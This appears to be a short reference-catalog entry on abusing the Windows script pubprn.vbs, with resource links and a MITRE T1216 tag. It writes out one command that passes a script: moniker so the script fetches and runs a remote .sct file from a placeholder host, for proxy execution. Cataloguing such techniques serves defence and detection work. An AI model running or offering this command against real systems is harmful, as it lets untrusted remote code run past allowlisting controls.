.. / Pubprn.vbs
Star


Paths:


Resources:
https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
https://github.com/enigma0x3/windows-operating-system-archaeology

Acknowledgement:
Matt Nelson - @enigma0x3


Detection:



Execute

Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
Usecase:Proxy execution
Privileges required:User
OS:Windows 10
Mitre:T1216